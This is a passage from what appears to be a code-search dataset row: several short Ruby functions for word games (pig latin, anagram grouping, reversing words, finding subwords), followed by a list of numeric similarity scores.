"def pig_it_ms_two(str)\n pig = []\n str.split.each do |w|\n pig << w.chars.rotate.join + \"ay\" if w =~ /\\w/\n pig << w if w =~ /\\W/\n end\n pig.join(\" \")\nend",
"def word_unscrambler(str, words)\n return words.keep_if {|word| word.chars.sort == str.chars.sort}\nend",
"def reverse_each_word(sentence2)\n new2 = []\n save2 = sentence2.split\n save2.collect do |more_words|\n new2 << more_words.reverse\n end\n new2.join(\" \")\nend",
"def find_concatenated(word)\n [].tap { |a| probe_words(0, word, a) }\n end",
"def combine_anagrams(words=[])\n return [] if words.empty?\n hash = {}\n words.each do |word|\n anagram = word.downcase.split(\"\").sort.join(\"\")\n if hash[anagram].nil? then\n hash[anagram]=[word]\n else\n hash[anagram].push(word)\n end\n end\n return hash.values\nend",
"def subwords(word, dictionary)\n arr = substrings(word)\n arr.select { |str| dictionary.include?(str) }\nend",
"def combine_anagrams(words)\n words_uniq = words.map{ |w| w.downcase.split(//).sort.join }.uniq\n words_uniq.map{ |wu| words.select{ |w| w.downcase.split(//).sort.join == wu }}\nend",
"def find_anagrams(base_word, word_list)\n word_list.select do |word|\n anagram?(base_word, word)\n end\nend"
] | [
"0.6646076",
"0.6422299",
"0.6274176",
"0.6154079",
"0.5990007",
"0.5912253",
"0.5783322",
"0.56626743",
"0.56262785",
"0.5603809",
"0.5599354",
"0.5597414",
"0.5511246",
"0.54985464",
"0.5465181",
"0.54564214",
"0.54392844",
"0.5434038",
"0.5416444",
"0.5407946",
"0.5404497",
"0.53956217",
"0.53777164",
"0.537201",
"0.5361397",
"0.5355884",
"0.53519475",
"0.5351933",
"0.5332793",
"0.53272885",
"0.53227526",
"0.5314751",
"0.5313844",
"0.530947",
"0.530234",
"0.52960294",
"0.5285006",
"0.52708",
"0.5261254",
"0.52609503",
"0.5258902",
"0.5245864",
"0.5243672",
"0.5207195",
"0.52065104",
"0.518032",
"0.5179291",
"0.5178227",
"0.5177758",
"0.51740974",
"0.5165691",
"0.5162833",
"0.5151367",
"0.5149879",
"0.51493675",
"0.5147591",
"0.5141891",
"0.51373214",
"0.5136203",
"0.513434",
"0.5130681",
"0.5116081",
"0.5111076",
"0.5108686",
"0.5106737",
"0.51051575",
"0.51048344",
"0.50955826",
"0.50843567",
"0.50723934",
"0.5071059",
"0.50633574",
"0.5060815",
"0.50535667",
"0.50462466",
"0.5043022",
"0.50423515",
"0.50361365",
"0.5029992",
"0.50140816",
"0.50140816",
"0.5009728",
"0.50088614",
"0.50007033",
"0.49915928",
"0.4989366",
"0.49778906",
"0.4977855",
"0.49695542",
"0.49690711",
"0.4967548",
"0.4962762",
"0.49573028",
"0.49519393",
"0.49519306",
"0.4951806",
"0.4941665",
"0.49416125",
"0.4940567",
"0.49375215"
] | 0.73009706 | 0 |
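The row above never shows how @index and @table are built; below is a minimal sketch of the shapes matching_bigrams appears to assume, with plain strings standing in for bigram objects (hypothetical data, method assumed defined at the top level):

@index = { "new" => ["york", "jersey"] }
@table = {
  ["new", "york"]   => "bigram(new york)",
  ["new", "jersey"] => "bigram(new jersey)"
}
matching_bigrams("new") # => ["bigram(new york)", "bigram(new jersey)"]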
Probability of bigram's occurrence in the corpus. | def probability(word1, word2=nil)
bigram = (Bigram === word1 ? word1 : get(word1, word2))
BigDecimal.new(bigram.count) / total #size
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def probability_of(gram)\n @probabilities.fetch(gram,0.0)\n end",
"def text_probability(text)\n probability_of_ngrams(ngrams_from_text(text))\n end",
"def calculate_probability(word)\n ham_word_frequency = 2 * words_hash[[word,:good]]\n spam_word_frequency = words_hash[[word, :bad]]\n return if ham_word_frequency + spam_word_frequency < 5\n word_probability = min(1.0, spam_word_frequency.to_f / spam_count)\n total_probability = word_probability + min(1.0, ham_word_frequency.to_f / ham_count)\n max(0.1, min(0.99, word_probability/total_probability))\n end",
"def probability(word)\n word = (Word === word ? word : get(word))\n BigDecimal.new(word.count) / total\n end",
"def file_probability(word1, word2=nil)\n bigram = (Bigram === word1 ? word1 : get(word1, word2))\n BigDecimal.new(bigram.files.size) / analysis.files.size\n end",
"def sentence_probability(sentence)\n probability_of_ngrams(ngrams_from_sentence(sentence))\n end",
"def calculate_probabilities\n @words_hash.keys.each do |word, _|\n @probability_hash[word] = calculate_probability(word)\n end\n end",
"def fragment_probability(fragment)\n probability_of_ngrams(ngrams_from_fragment(fragment))\n end",
"def spamicity(message)\n words = message.split(/\\W+/).map { |m| m.downcase}\n intersting_words_probability_list = intersting_words(words)\n intersting_words_product = intersting_words_probability_list.inject(:*)\n total_probability = intersting_words_product + intersting_words_probability_list.map { |x| 1 - x }.inject(:*)\n intersting_words_product / total_probability\n end",
"def full_bigram_counts\n {\n'TH' => 116997844,\n'HE' => 100689263,\n'IN' => 87674002,\n'ER' => 77134382,\n'AN' => 69775179,\n'RE' => 60923600,\n'ES' => 57070453,\n'ON' => 56915252,\n'ST' => 54018399,\n'NT' => 50701084,\n'EN' => 48991276,\n'AT' => 48274564,\n'ED' => 46647960,\n'ND' => 46194306,\n'TO' => 46115188,\n'OR' => 45725191,\n'EA' => 43329810,\n'TI' => 42888666,\n'AR' => 42353262,\n'TE' => 42295813,\n'NG' => 38567365,\n'AL' => 38211584,\n'IT' => 37938534,\n'AS' => 37773878,\n'IS' => 37349981,\n'HA' => 35971841,\n'ET' => 32872552,\n'SE' => 31532272,\n'OU' => 31112284,\n'OF' => 30540904,\n'LE' => 30383262,\n'SA' => 30080131,\n'VE' => 29320973,\n'RO' => 29230770,\n'RA' => 28645577,\n'RI' => 27634643,\n'HI' => 27495342,\n'NE' => 27331675,\n'ME' => 27237733,\n'DE' => 27029835,\n'CO' => 26737101,\n'TA' => 26147593,\n'EC' => 25775798,\n'SI' => 25758841,\n'LL' => 24636875,\n'SO' => 23903631,\n'NA' => 23547524,\n'LI' => 23291169,\n'LA' => 23178317,\n'EL' => 23092248,\n'MA' => 21828378,\n'DI' => 21673998,\n'IC' => 21468412,\n'RT' => 21456059,\n'NS' => 21306421,\n'RS' => 21237259,\n'IO' => 21210160,\n'OM' => 21066156,\n'CH' => 20132750,\n'OT' => 20088048,\n'CA' => 19930754,\n'CE' => 19803619,\n'HO' => 19729026,\n'BE' => 19468489,\n'TT' => 19367472,\n'FO' => 18923772,\n'TS' => 18922522,\n'SS' => 18915696,\n'NO' => 18894111,\n'EE' => 18497942,\n'EM' => 18145294,\n'AC' => 17904683,\n'IL' => 17877600,\n'DA' => 17584055,\n'NI' => 17452104,\n'UR' => 17341717,\n'WA' => 16838794,\n'SH' => 16773127,\n'EI' => 16026915,\n'AM' => 15975981,\n'TR' => 15821226,\n'DT' => 15759673,\n'US' => 15699353,\n'LO' => 15596310,\n'PE' => 15573318,\n'UN' => 15237699,\n'NC' => 15214623,\n'WI' => 15213018,\n'UT' => 15137169,\n'AD' => 14877234,\n'EW' => 14776406,\n'OW' => 14610429,\n'GE' => 14425023,\n'EP' => 14024377,\n'AI' => 13974919,\n'LY' => 13742031,\n'OL' => 13726491,\n'FT' => 13696078,\n'OS' => 13596265,\n'EO' => 13524186,\n'EF' => 13252227,\n'PR' => 13191182,\n'WE' => 13185116,\n'DO' => 13120322,\n'MO' => 12950768,\n'ID' => 12896787,\n'IE' => 12505546,\n'MI' => 12168944,\n'PA' => 12068709,\n'FI' => 11993833,\n'PO' => 11917535,\n'CT' => 11888752,\n'WH' => 11852909,\n'IR' => 11681353,\n'AY' => 11523416,\n'GA' => 11239788,\n'SC' => 10800636,\n'KE' => 10650670,\n'EV' => 10574011,\n'SP' => 10570626,\n'IM' => 10544422,\n'OP' => 10459455,\n'DS' => 10429887,\n'LD' => 10245579,\n'UL' => 10173468,\n'OO' => 10168856,\n'SU' => 10031005,\n'IA' => 10002012,\n'GH' => 9880399,\n'PL' => 9812226,\n'EB' => 9738798,\n'IG' => 9530574,\n'VI' => 9380037,\n'IV' => 9129232,\n'WO' => 9106647,\n'YO' => 9088497,\n'RD' => 9025637,\n'TW' => 8910254,\n'BA' => 8867461,\n'AG' => 8809266,\n'RY' => 8788539,\n'AB' => 8775582,\n'LS' => 8675452,\n'SW' => 8673234,\n'AP' => 8553911,\n'FE' => 8529289,\n'TU' => 8477495,\n'CI' => 8446084,\n'FA' => 8357929,\n'HT' => 8351551,\n'FR' => 8339376,\n'AV' => 8288885,\n'EG' => 8286463,\n'GO' => 8188708,\n'BO' => 8172395,\n'BU' => 8113271,\n'TY' => 8008918,\n'MP' => 7835172,\n'OC' => 7646952,\n'OD' => 7610214,\n'EH' => 7559141,\n'YS' => 7539621,\n'EY' => 7528342,\n'RM' => 7377989,\n'OV' => 7350014,\n'GT' => 7347990,\n'YA' => 7239548,\n'CK' => 7205091,\n'GI' => 7103140,\n'RN' => 7064635,\n'GR' => 6989963,\n'RC' => 6974063,\n'BL' => 6941044,\n'LT' => 6817273,\n'YT' => 6714151,\n'OA' => 6554221,\n'YE' => 6499305,\n'OB' => 6212512,\n'DB' => 6106719,\n'FF' => 6085519,\n'SF' => 6073995,\n'RR' => 5896212,\n'DU' => 5861311,\n'KI' => 5814357,\n'UC' => 5742385,\n'IF' => 5740414,\n'AF' => 5702567,\n'DR' => 5701879,\n'CL' => 
5683204,\n'EX' => 5649363,\n'SM' => 5580755,\n'PI' => 5559210,\n'SB' => 5553684,\n'CR' => 5514347,\n'TL' => 5403137,\n'OI' => 5336616,\n'RU' => 5330557,\n'UP' => 5306948,\n'BY' => 5232074,\n'TC' => 5196817,\n'NN' => 5180899,\n'AK' => 5137311,\n'SL' => 4965012,\n'NF' => 4950333,\n'UE' => 4927837,\n'DW' => 4906814,\n'AU' => 4884168,\n'PP' => 4873393,\n'UG' => 4832325,\n'RL' => 4803246,\n'RG' => 4645938,\n'BR' => 4621080,\n'CU' => 4604045,\n'UA' => 4589997,\n'DH' => 4585765,\n'RK' => 4491400,\n'YI' => 4461214,\n'LU' => 4402940,\n'UM' => 4389720,\n'BI' => 4356462,\n'NY' => 4343290,\n'NW' => 4215967,\n'QU' => 4169424,\n'OG' => 4163126,\n'SN' => 4157990,\n'MB' => 4121764,\n'VA' => 4111375,\n'DF' => 4033878,\n'DD' => 4001275,\n'MS' => 3922855,\n'GS' => 3920675,\n'AW' => 3918960,\n'NH' => 3915410,\n'PU' => 3858148,\n'HR' => 3843001,\n'SD' => 3842250,\n'TB' => 3815459,\n'PT' => 3812475,\n'NM' => 3796928,\n'DC' => 3782481,\n'GU' => 3768430,\n'TM' => 3759861,\n'MU' => 3755834,\n'NU' => 3732602,\n'MM' => 3730508,\n'NL' => 3692985,\n'EU' => 3674130,\n'WN' => 3649615,\n'NB' => 3602692,\n'RP' => 3588188,\n'DM' => 3544905,\n'SR' => 3513808,\n'UD' => 3499535,\n'UI' => 3481482,\n'RF' => 3436232,\n'OK' => 3397570,\n'YW' => 3379064,\n'TF' => 3368452,\n'IP' => 3348621,\n'RW' => 3348005,\n'RB' => 3346212,\n'OH' => 3254659,\n'KS' => 3227333,\n'DP' => 3145043,\n'FU' => 3138900,\n'YC' => 3128053,\n'TP' => 3070427,\n'MT' => 3055946,\n'DL' => 3050945,\n'NK' => 3043200,\n'CC' => 3026492,\n'UB' => 2990868,\n'RH' => 2968706,\n'NP' => 2968126,\n'JU' => 2924815,\n'FL' => 2890839,\n'DN' => 2840522,\n'KA' => 2833038,\n'PH' => 2825344,\n'HU' => 2771830,\n'JO' => 2721345,\n'LF' => 2702522,\n'YB' => 2696786,\n'RV' => 2692445,\n'OE' => 2616308,\n'IB' => 2598444,\n'IK' => 2585124,\n'YP' => 2581863,\n'GL' => 2576787,\n'LP' => 2543957,\n'YM' => 2516273,\n'LB' => 2463693,\n'HS' => 2462026,\n'DG' => 2442139,\n'GN' => 2426429,\n'EK' => 2411639,\n'NR' => 2393580,\n'PS' => 2377036,\n'TD' => 2346516,\n'LC' => 2328063,\n'SK' => 2321888,\n'YF' => 2305244,\n'YH' => 2291273,\n'VO' => 2253292,\n'AH' => 2225270,\n'DY' => 2218040,\n'LM' => 2216514,\n'SY' => 2214270,\n'NV' => 2194534,\n'YD' => 2122337,\n'FS' => 2047416,\n'SG' => 2043770,\n'YR' => 2021939,\n'YL' => 2013939,\n'WS' => 1988727,\n'MY' => 1949129,\n'OY' => 1932892,\n'KN' => 1903836,\n'IZ' => 1865802,\n'XP' => 1840696,\n'LW' => 1836811,\n'TN' => 1782119,\n'KO' => 1758001,\n'AA' => 1721143,\n'JA' => 1712763,\n'ZE' => 1709871,\n'FC' => 1570791,\n'GW' => 1567991,\n'TG' => 1530045,\n'XT' => 1509969,\n'FH' => 1507604,\n'LR' => 1505092,\n'JE' => 1487348,\n'YN' => 1485655,\n'GG' => 1468286,\n'GF' => 1465290,\n'EQ' => 1461436,\n'HY' => 1446451,\n'KT' => 1443985,\n'HC' => 1441057,\n'BS' => 1409672,\n'HW' => 1403223,\n'HN' => 1383958,\n'CS' => 1381608,\n'HM' => 1353001,\n'NJ' => 1342735,\n'HH' => 1329998,\n'WT' => 1301293,\n'GC' => 1299541,\n'LH' => 1274048,\n'EJ' => 1256993,\n'FM' => 1251312,\n'DV' => 1238565,\n'LV' => 1238287,\n'WR' => 1226755,\n'GP' => 1215204,\n'FP' => 1199845,\n'GB' => 1184377,\n'GM' => 1178511,\n'HL' => 1169468,\n'LK' => 1164186,\n'CY' => 1145316,\n'MC' => 1101727,\n'YG' => 1049082,\n'XI' => 1024736,\n'HB' => 1014004,\n'FW' => 1005903,\n'GY' => 979804,\n'HP' => 978649,\n'MW' => 937621,\n'PM' => 931225,\n'ZA' => 929119,\n'LG' => 926472,\n'IW' => 922059,\n'XA' => 904148,\n'FB' => 888155,\n'SV' => 882083,\n'GD' => 879792,\n'IX' => 879360,\n'AJ' => 870262,\n'KL' => 846309,\n'HF' => 834284,\n'HD' => 828755,\n'AE' => 815963,\n'SQ' => 800346,\n'DJ' => 799366,\n'FY' => 
789961,\n'AZ' => 768359,\n'LN' => 752316,\n'AO' => 749566,\n'FD' => 748027,\n'KW' => 719633,\n'MF' => 715087,\n'MH' => 710864,\n'SJ' => 704442,\n'UF' => 701892,\n'TV' => 698150,\n'XC' => 697995,\n'YU' => 695512,\n'BB' => 689158,\n'WW' => 674610,\n'OJ' => 661082,\n'AX' => 660826,\n'MR' => 660619,\n'WL' => 657782,\n'XE' => 653947,\n'KH' => 650095,\n'OX' => 650078,\n'UO' => 649906,\n'ZI' => 644035,\n'FG' => 637758,\n'IH' => 610683,\n'TK' => 610333,\n'II' => 607124,\n'IU' => 576683,\n'TJ' => 559473,\n'MN' => 558397,\n'WY' => 553647,\n'KY' => 553296,\n'KF' => 537342,\n'FN' => 534362,\n'UY' => 531960,\n'PW' => 530411,\n'DK' => 525744,\n'RJ' => 518157,\n'UK' => 514873,\n'KR' => 507020,\n'KU' => 506618,\n'WM' => 505687,\n'KM' => 485617,\n'MD' => 481126,\n'ML' => 478528,\n'EZ' => 465466,\n'KB' => 457860,\n'WC' => 448394,\n'WD' => 432646,\n'HG' => 429607,\n'BT' => 428276,\n'ZO' => 424016,\n'KC' => 420017,\n'PF' => 418168,\n'YV' => 411487,\n'PC' => 400308,\n'PY' => 396147,\n'WB' => 394820,\n'YK' => 391953,\n'CP' => 382923,\n'YJ' => 378679,\n'KP' => 375653,\n'PB' => 369336,\n'CD' => 358435,\n'JI' => 357577,\n'UW' => 352732,\n'UH' => 339341,\n'WF' => 336213,\n'YY' => 332973,\n'WP' => 321746,\n'BC' => 320380,\n'AQ' => 315068,\n'CB' => 298053,\n'IQ' => 291635,\n'CM' => 285942,\n'MG' => 285133,\n'DQ' => 283314,\n'BJ' => 282608,\n'TZ' => 280007,\n'KD' => 277982,\n'PD' => 273162,\n'FJ' => 269865,\n'CF' => 267630,\n'NZ' => 266461,\n'CW' => 257253,\n'FV' => 244685,\n'VY' => 233082,\n'FK' => 228905,\n'OZ' => 228556,\n'ZZ' => 221275,\n'IJ' => 219128,\n'LJ' => 218362,\n'NQ' => 217422,\n'UV' => 212051,\n'XO' => 211173,\n'PG' => 211133,\n'HK' => 210385,\n'KG' => 209266,\n'VS' => 204093,\n'HV' => 197539,\n'BM' => 191807,\n'HJ' => 189906,\n'CN' => 188046,\n'GV' => 186777,\n'CG' => 181590,\n'WU' => 180884,\n'GJ' => 176947,\n'XH' => 166599,\n'GK' => 163830,\n'TQ' => 159111,\n'CQ' => 157546,\n'RQ' => 156933,\n'BH' => 154489,\n'XS' => 154347,\n'UZ' => 153736,\n'WK' => 148964,\n'XU' => 147533,\n'UX' => 144814,\n'BD' => 141752,\n'BW' => 140189,\n'WG' => 139890,\n'MV' => 136314,\n'MJ' => 134263,\n'PN' => 131645,\n'XM' => 127492,\n'OQ' => 122677,\n'BV' => 120081,\n'XW' => 119322,\n'KK' => 118811,\n'BP' => 115161,\n'ZU' => 113538,\n'RZ' => 113432,\n'XF' => 113031,\n'MK' => 111041,\n'ZH' => 107639,\n'BN' => 106125,\n'ZY' => 105871,\n'HQ' => 101241,\n'WJ' => 99435,\n'IY' => 98361,\n'DZ' => 98038,\n'VR' => 96416,\n'ZS' => 94993,\n'XY' => 94329,\n'CV' => 94224,\n'XB' => 94041,\n'XR' => 90046,\n'UJ' => 88168,\n'YQ' => 87953,\n'VD' => 85611,\n'PK' => 83017,\n'VU' => 82830,\n'JR' => 80471,\n'ZL' => 80039,\n'SZ' => 79840,\n'YZ' => 78281,\n'LQ' => 77148,\n'KJ' => 76816,\n'BF' => 75352,\n'NX' => 74844,\n'QA' => 73527,\n'QI' => 73387,\n'KV' => 73184,\n'ZW' => 68865,\n'WV' => 63930,\n'UU' => 63043,\n'VT' => 62912,\n'VP' => 62577,\n'XD' => 60101,\n'GQ' => 59750,\n'XL' => 59585,\n'VC' => 59024,\n'CZ' => 57914,\n'LZ' => 57314,\n'ZT' => 56955,\n'WZ' => 52836,\n'SX' => 50975,\n'ZB' => 50652,\n'VL' => 49032,\n'PV' => 48105,\n'FQ' => 47504,\n'PJ' => 47043,\n'ZM' => 46034,\n'VW' => 45608,\n'CJ' => 41526,\n'ZC' => 41037,\n'BG' => 40516,\n'JS' => 39326,\n'XG' => 39289,\n'RX' => 38654,\n'HZ' => 37066,\n'XX' => 35052,\n'VM' => 35024,\n'XN' => 34734,\n'QW' => 34669,\n'JP' => 34520,\n'VN' => 33082,\n'ZD' => 32906,\n'ZR' => 32685,\n'FZ' => 31186,\n'XV' => 31117,\n'ZP' => 30389,\n'VH' => 30203,\n'VB' => 29192,\n'ZF' => 28658,\n'GZ' => 28514,\n'TX' => 28156,\n'VF' => 28090,\n'DX' => 27413,\n'QB' => 27307,\n'BK' => 26993,\n'ZG' => 26369,\n'VG' => 
25585,\n'JC' => 24770,\n'ZK' => 24262,\n'ZN' => 24241,\n'UQ' => 23386,\n'JM' => 22338,\n'VV' => 22329,\n'JD' => 21903,\n'MQ' => 21358,\n'JH' => 20960,\n'QS' => 20847,\n'JT' => 20408,\n'JB' => 19380,\n'FX' => 19313,\n'PQ' => 18607,\n'MZ' => 18271,\n'YX' => 16945,\n'QT' => 16914,\n'WQ' => 16245,\n'JJ' => 16085,\n'JW' => 16083,\n'LX' => 15467,\n'GX' => 14778,\n'JN' => 14452,\n'ZV' => 14339,\n'MX' => 14250,\n'JK' => 13967,\n'KQ' => 13905,\n'XK' => 13651,\n'JF' => 12640,\n'QM' => 12315,\n'QH' => 12273,\n'JL' => 12149,\n'JG' => 12023,\n'VK' => 11469,\n'VJ' => 11432,\n'KZ' => 11192,\n'QC' => 10667,\n'XJ' => 10629,\n'PZ' => 9697,\n'QL' => 9603,\n'QO' => 9394,\n'JV' => 8925,\n'QF' => 8778,\n'QD' => 8678,\n'BZ' => 8132,\n'HX' => 7526,\n'ZJ' => 7167,\n'PX' => 6814,\n'QP' => 6062,\n'QE' => 6020,\n'QR' => 5975,\n'ZQ' => 5773,\n'JY' => 5723,\n'BQ' => 5513,\n'XQ' => 5416,\n'CX' => 5300,\n'KX' => 5083,\n'WX' => 4678,\n'QY' => 4557,\n'QV' => 4212,\n'QN' => 3808,\n'VX' => 3192,\n'BX' => 3021,\n'JZ' => 2859,\n'VZ' => 2633,\n'QG' => 2567,\n'QQ' => 2499,\n'ZX' => 2463,\n'XZ' => 2082,\n'QK' => 2023,\n'VQ' => 1488,\n'QJ' => 1342,\n'QX' => 765,\n'JX' => 747,\n'JQ' => 722,\n'QZ' => 280\n}\n end",
"def calc_probability(actual_word, translation_word)\n d = levenshtein_distance(actual_word, translation_word)\n\n min_leng= actual_word.size < translation_word.size ? actual_word.size : translation_word.size\n p = 1.0 - d * 1.0 / min_leng\n p < 0 ? 0.0 : p\n end",
"def calculate_kn_probability next_ngram: nil, ngram_model: 0, discount: 0.25, ngram_counts: @ngram_counts, good_turing_bins: @good_turing_bins, separator: \" \"\n local_ngram_model = ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n \n return calculate_mle_probability(next_ngram: next_ngram, separator: separator) if local_ngram_model==1 # Recursion stops at the unigram model\n\n prefix_regex = /^#{next_ngram.split(separator)[0..-2].join(separator)}\\b/\n prefix = next_ngram.split(separator)[0..-2].join(separator)\n suffix = next_ngram.split(separator).last\n similar_ngrams = ngram_counts[local_ngram_model].select{|ngram, _| puts \"Found #{prefix.green} #{ngram.split[1..-1].join(\" \").brown}\" if (@verbose and ngram.match(prefix_regex)); ngram.match(prefix_regex)}.count # Number of words which complete the current n-1 gram, e.g. for the n-gram \"your house looks nice\" we count \"yhl ugly\", \"yhl fine\" etc. Notice - we don't counts the number of occurences for \"yhl ugly\" etc but only the number of lower-order ngrams which complete the current ngram.\n puts \"#{'Total of '.red + similar_ngrams.to_s.red + ' found.'.red} Now calculating counts.\" if @verbose\n similar_ngrams_total_counts = ngram_counts[local_ngram_model].reduce(0){|acc, (ngram, counts)| puts \"Found #{prefix.green} #{ngram.split[1..-1].join(\" \").brown} with raw count of #{counts}\" if (@verbose and ngram.match?(prefix_regex)); if ngram.match(prefix_regex) then acc += counts; else acc; end} # It's here that we actually sum up the counts\n puts \"#{'Total count is '.red + similar_ngrams_total_counts.to_s.red}\"\n ngrams_with_fixed_suffix = ngram_counts[local_ngram_model].reduce(0){|acc, (ngram, counts)| puts \"Found #{ngram.brown} / #{suffix.green} with raw count of #{counts}\" if (@verbose and ngram.match?(/^#{suffix}\\b/)); acc += counts if ngram.match?(/^#{suffix}\\b/); acc}\n\n first_term = [get_raw_counts(next_ngram).to_f - discount, 0].max / similar_ngrams_total_counts.to_f\n second_term = discount * (similar_ngrams.to_f/ngrams_with_fixed_suffix.to_f)\n \n return first_term + (second_term * calculate_kn_probability(next_ngram: next_ngram.split(separator)[1..-1].join(separator)))\n end",
"def p(trigram)\n\n bigram = trigram[1..2]\n unigram = trigram[2..2]\n # see which case we fall into for this backoff scheme\n if @counts.include?(trigram)\n # p1 function, trigram exists\n return pML(trigram, @discount)\n else\n ngram = nil\n beta_gram = nil\n alpha = 0\n if @counts.include?(bigram)\n # p2 function, no trigram but bigram exists\n ngram = bigram\n beta_gram = trigram[0..1] # the words used to help generate a beta-set of zero-count trigram\n # alpha mass redistribution\n alpha = @weights[:p2] * (1 - pML(trigram, @discount))\n else\n # p3 function, no trigram or bigram\n ngram = unigram\n beta_gram = trigram[0..0] # the words used to help generate a beta-set of zero-count bigrams\n # alpha mass redistribution\n alpha = @weights[:p3] * (1 - pML(trigram, @discount))\n end\n\n numerator = pML(ngram) \n denominator = @beta_gram_cache.fetch(beta_gram, nil) \n if not denominator\n dgram = nil\n sum = 0\n @vocab.each do |v| # all permutations of vocab words\n dgram = beta_gram + [v]\n # that are zero-count ngrams of (w,w_i-1,w_i-2) or (w,w_i-1)\n if not @counts.include?(dgram)\n # should be part of the sum of pML(w|w_i-1) or pML(w)\n sum += pML(dgram.drop(1)) # drop w_i-2 or w_i-1 as needed\n end\n end\n\n @beta_gram_cache.store(beta_gram, sum)\n denominator = sum\n end\n\n if denominator == 0 then return 0 end\n return alpha * numerator / denominator\n end\n\n end",
"def word_tag_probability(word, tag)\n denom = @tag_frequencies[tag]\n\n if denom.zero?\n 0\n else\n @word_tag_combos[\"#{word}/#{tag}\"] / denom.to_f\n end\n end",
"def dump_bigram_info_from_hash()\n\n cumulative_bigram_count = 0\n\n $bigram_count.keys.sort.each do |bigram|\n local_lead_word = bigram.split(/\\s/)[0] #shouldn't need to extract this each time\n cumulative_bigram_count += $bigram_count[bigram]\n cumulative_proportion = cumulative_bigram_count.to_f / $lead_word_count[local_lead_word].to_f\n puts sprintf(\"%s\\t%f\", bigram, cumulative_proportion )\n end\n\nend",
"def word_probability(word, category)\n total_words_in_category = total_word_count_in_category(category)\n return 0.0 if total_words_in_category == 0\n word_count(word, category).to_f / total_words_in_category\n end",
"def doc_probability(category)\n doc_prob = 1.0\n self.words.each do |word|\n doc_prob *= BayesCategory.where(:category=>category).first.word_probability(word[0])\n end\n doc_prob\n end",
"def pEstimate(sentence)\n probability = 1\n tokens = sentence.split\n (2..(tokens.size-1)).to_a.each do |i|\n probability *= q(tokens[i-2..i])\n end\n probability\n end",
"def probability_of_ngrams(ngrams)\n probabilities = probabilities_for(ngrams).values\n \n return (probabilities.inject { |joint,prob| joint * prob } || 0.0)\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def score(other_counts)\n\t\tscore = 0.0\n\t\tseen = 0\n\t\tother_counts.each { |k, v|\n\t\t\tcount = @trigram_counts[k]\n\t\t\tscore += v * Math.log(@probs[@trigram_counts[k]])\n\t\t}\n\t\tscore\n\tend",
"def frequency_of(gram)\n @frequencies.fetch(gram,0)\n end",
"def probability_token_in_label(label, token)\n (@data[label][token] || 0).to_f / @doc_counts[label].to_f\n end",
"def weighted_probability(word)\n word = (Word === word ? word : get(word))\n\n p = BigDecimal.new(1)\n p = p * probability(word)\n p = p * file_probability(word, 1)\n #p = p * lexicon_weight(word)\n #p = p * weight_length(word)\n #p = p * weight_stem(word)\n #p = p * weight_plural(word)\n p\n end",
"def most_probable_next_word(string)\n words = string.split(\" \")\n bigram_key = words.last\n trigram_key = words.last(2).join(\" \") if words.count >= 2\n most_probable_word = \"\"\n\n ## if we can find trigram and trigram exists\n if words.count >= 2 and @trigrams[trigram_key] != nil\n # get w3 from grams with highest P(w1,w2,w3) = P(w1)*P(w2|w1)*P(w3|w1,w2)\n highest_probability = 0.0\n\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(trigram_key + \" \" + word)\n # if P(w1)*P(w2|w1)*P(w3|w1,w2) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n\n puts \"ERROR IN TRIGRAMS\" if highest_probability == 0.0\n puts \"Trigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 3).round(4).to_s\n return most_probable_word\n ## if we can find a bigram and bigram exists\n elsif words.count >= 1 and @bigrams[bigram_key] != nil\n # get w2 from grams with highest P(w2|w1)\n highest_probability = 0.0\n\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(bigram_key + \" \" + word)\n # if P(w1)*P(w2|w1) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n puts \"ERROR IN BIGRAMS\" if highest_probability == 0.0\n puts \"Bigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 2).round(4).to_s\n return most_probable_word\n ## return random unigram?\n else\n highest_probability = 0.0\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(word)\n # if P(w1)*P(w2|w1) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n puts \"Unigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 1).round(4).to_s\n return most_probable_word\n end\n end",
"def get_token_probability(token, category_index)\n denom = @total_token_counts[category_index] + @token_counts[category_index].size * @prior_token_count \n if denom == 0\n return 0\n else\n return ((@token_counts[category_index][token] || 0) + @prior_token_count).to_f / denom\n end\n end",
"def wordprob(word, category)\n numerator = self.word_count_in_category(word, category) + 1\n denominator = self.all_word_count_in_category(category) + self.vocabularies.size\n return numerator / denominator\n end",
"def file_probability(word, threshold=0)\n word = (Word === word ? word : get(word))\n n = 1 # at least one\n word.files.each do |f, c|\n n += 1 if c > threshold\n end\n BigDecimal.new(n) / corpus_files.size\n end",
"def frequency(char)\n return 0 if (@size.nil? || @size <= 0)\n @map[char.upcase] * 100/@size\n end",
"def most_frequent_bigram(str)\n bigrams_hash = biagram_hash(str)\n bigrams_hash.key(bigrams_hash.values.max)\nend",
"def pangram?\n return @hist.size == 26\n end",
"def probabilities\n Hash[ BayesCategory.all.to_a.collect { |word|\n [word.category, probability(word.category)]\n }]\n end",
